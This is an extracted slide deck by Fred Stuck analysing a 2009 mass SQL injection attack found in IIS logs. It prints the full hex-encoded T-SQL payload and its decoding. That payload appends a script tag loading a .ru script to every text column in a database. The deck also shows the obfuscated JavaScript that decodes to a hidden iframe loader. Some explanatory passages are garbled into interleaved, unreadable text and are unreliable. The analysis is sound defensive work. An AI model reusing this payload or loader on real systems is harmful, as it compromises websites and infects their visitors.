Get documents about "SQL Injection Attack Overview
Document Sample
SQL Injection Attack
Overview
Step by step analysis of a
SQL Injection attack
Code Obfuscation a Definition
IIS Log Entry
Decoding the HEX Part 1
SQL Injection Code
Decoding the HEX Part 2
Injected Code
Where is this coming from?
Code Obfuscation a Definition
“Obfuscated code is source or machine code
that has been made difficult to understand.
Programmers may deliberately obfuscate code
to conceal its purpose (a form of security
through obscurity), to deter reverse
engineering, or as a puzzle or recreational
challenge for readers. Programs known as
obfuscators transform human-readable code
into obfuscated code using various techniques.”
-Wikipedia
This is the IIS log that is generated during the
attack. In the next slide we remove the URL
IIS Log Entry
encoding and make the information highlighted
in yellow more readable.
\\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1
GET /client/file.asp adid=24&category=Texas+03-
04%2F08;DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x4445436C41724520405420
5641524348617228323535292C406320566152436861522832353529206445636C4172652074614
24C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E6
16D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726
520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E587479506
53D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E5
8745970453D31363729204F70456E207441426C455F435552734F72204645746348204E65787420
46726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C452840404645
5463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B
275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834
303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230
3733373236333344363837343734373033413246324637373737373732453632363136453645363
5373237343245373237353246363136343733324536413733334533433246373336333732363937
3037343345206173207641524348417228353129292729204665746348204E6558742046524F4D2
05441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C45
5F437572736F72206445414C6C4F63415445205441424C655F435552736F5220%20aS%20varcH
Ar(4000));exEc(@S);-- 80 - 123.204.243.229 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -
www.domain.com 200 0 0 13542 1641 1015
After removing the URL encoding and adding some line feeds we have the following
code. The cast statement converts the log HEX string into a Variable Character Field
(varchar). Next the EXEC command executes this decoded string.
IIS Log Entry - Removing URL Encoding
CAST: Translates the
/client/file.asp
adid=24&category=Texas 03-04/08; HEX expression into a
DECLARE @s VaRcHAr(4000); character string
SET @S=casT(
0x4445436C417245204054205641524348617228323535292C40632056615243686152283235352
9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374
20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C
554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720
614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950
653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72
204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406
3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570
64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657
27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333
6333732363937303734323037333732363333443638373437343730334132463246373737373737
3245363236313645364536353732373432453732373532463631363437333245364137333345334
3324637333633373236393730373433452061732076415243484172283531292927292046657463
48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442
0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552
736F5220 aS varcHAr(4000));
exEc(@S);
EXEC: Executes this string
This causes through HEX of the columns and interesting stringto attack sysobject and
Herequery in the encoded HEXitscode uses an appends a we applyeach the entire string
It then loops the the all of these vary significantly Once trick to it to and This
The we decode begining into to ASCII equivalent. from attack by using row. is an
syscolumns, special tables to point Server.
attempt also full detection. within willout that The query selects all slide.
we haveto avoid code. in HEX. WeSQL look at this code is in the next User defined
string is the encoded I’d like further somewhat dynamic in
tables You can see a variety of upper and lower case can hold a string of characters.
nature.and then limits it to columns with datatypes that characters in the code.
Decoding the HEX part 1
sysobjects: Contains one row syscolumns: Contains one
for each object (constraint, row for every column in every
default, log, rule, stored table and view, and a row for
0x4445436C41724520405420564152434861 … procedure, and so on) created each parameter in a stored
DEClArE @T VARCHar(255),@c VaRChaR(255)
0x44 = 68 = D within a database. procedure. This table is in each
dEclAre taBLe_cuRsoR CURSoR
0x45 = 69 = E database.
fOr SElECt A.name,b.name FroM sysobjECts a, sYsCOlUMns b
0x43 = 67 = C
where A.Id=b.id aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167)
0x6C = 108 = l
OpEn tABlE_CURsOr
0x41 = 65 = A
FEtcH Next From tAbLe_CUrsOR INTo @T,@c XType:
0x72 = 114 = r
whilE(@@FETch_STAtUS=0) U = User table
0x45 = 69 = E
Begin 35 = text
0x20 = 32 =
ExEc('UpdaTe ['+@T+'] 99 = ntext
0x40 = 64 = @
SEt ['+@C+']= 167 = varchar
0x54 = 84 = T
RTRiM(COnVert(VArCHAR(4000),['+@C+']))+ 231 = nvarchar
0x20 = 32 =
CAST(0X3C736372697074207372633D687474703A2F2F7777772E6
0x56 = 86 = V
2616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
0x41 = 65 = A
as vARCHAr(51))')
0x52 = 82 = R
FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C
0x43 = 67 = C
EnD
0x48 = 72 = H
ClOse TAbLE_Cursor
0x61 = 97 = a
dEALlOcATE TABLe_CURsoR
Using the same method as before we very easily determine that the injected string is a
script tag pointing to ads.js. I have also experienced changes to this URL from attack
to attack. I have decoded about four different locations for ads.js as of this writing.
Decoding the HEX part 2
0x3C736372697074207372633D687474703A2F2F7777772E626
16E6E6572742E72752F6164732E6A733E3C2F7363726970743E
<script src=http://www.bannert.ru/ads.js></script>
Since most of the code within ads.js is not utilized I’ll stick with what is. The first part is
The two functions within the write statement are very similar so I will only explain one
of interesting way of hiding the their differences are.
anthem but I will indicate where write command. They utilize the replace function to
remove the 5 from within the string literal concealing it from detection.
Injected Code – Java Script
<script src=http://www.bannert.ru/ads.js></script>
document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
Nextnext stepof this the code to set up an array based on the cipher text split on the
it loops is for function these some variables. These variables are the on
The first part through each ofsets upelements and splits it once again howeveronlythe
differences between the two functions. The first two areand determines the resultant
plus sign. It then performs first array element would be a decryption key and the last
commas. For example the the decryption mathematics 90+0.
is the cipher text.
string.
Injected Code – Java Script
<iframe width=1 height=1 border=0 frameborder=0 s
function RfCEPXiV(KDZJF){
var Ffwx=6,
TMplSKEfAW=4;
var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,
150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2,
73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0,
145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2,
171+0,',
QlnGAowZ=VhoWIRnEH.split(','); Splits the string at the commas
gHuP='';
for(THLfo=0;THLfo<QlnGAowZ.length-1;THLfo++)
90*4 + 0 = 360
{
157*4 + 2 = 630
MhbtCwq=QlnGAowZ[THLfo].split('+'); Splits the string at the plus
153*4 + 0 = 612
gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]);
171*4 + 0 = 684
gAJys = parseInt(gAJys)/Ffwx;
360/6 = 60 60 = < 145*4 + 2 = 582
gHuP += String.fromCharCode(gAJys);
630/6 = 105 105 = i …
}
return gHuP;} 612/6 = 102 102 = f
684/6 = 114 114 = r
582/6 = 97 97 = a
… …
The results form both functions result in an iframe which loads index.php. At this point I
stopped my investigation partly because the index.php file returned a Page Not Found
error. As noted bellow there are three possible conditions at this point.
Injected Code – php & css
<iframe width=1 height=1 border=0 frameborder=0 src='http://ads-
t.ru/ad/index.php'></iframe>
Index.php simulates an „Error 404 - Page Not Found‟ however it has custom Java Script as well
as a cascading style sheet which specifies background images.
One of three conditions exist.
This site has been identified as malicious and has been removed from the hosting provider
The images specified in the CSS could be malicious in nature.
They have not activated the malicious code and could do so at anytime.
By performing a WhoIsa Google search for a Storm that would IISprovided can a link
The some communications with the address identified in I was logs a vulnerable
Afterprogram performs on the sourceInternet string Centerthe indicate we with
determineentry this Aprilthe attack (click here to from it). The handlers at thefor other
site diary that for particular attack originated see Taiwan. IP addresses ISC actually
to a and then executes 16, 2008 against them.
attacks varied in origin however so far all havethat utilizes from Asia. identify sites that
have the code (apparently written in Chinese) originated Google to
are vulnerable to this attack.
Where is this coming from?
inetnum: 123.204.0.0 - 123.205.255.255
123.204.243.229
netname: SEEDNET-NET
descr: Digital United Inc.
descr: 7F,220,gangchi road
descr: Taipei Taiwan 114
country: TW
admin-c: MC37-AP
tech-c: MC37-AP
status: ALLOCATED PORTABLE
notify: michaelc@du.net.tw
mnt-by: MAINT-TW-TWNIC
mnt-lower: MAINT-TW-TWNIC
mnt-routes: MAINT-TW-TWNIC
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20061228
source: APNIC
SQL Injection Attack
Overview
Thank you for watching
Fred Stuck
Related docs
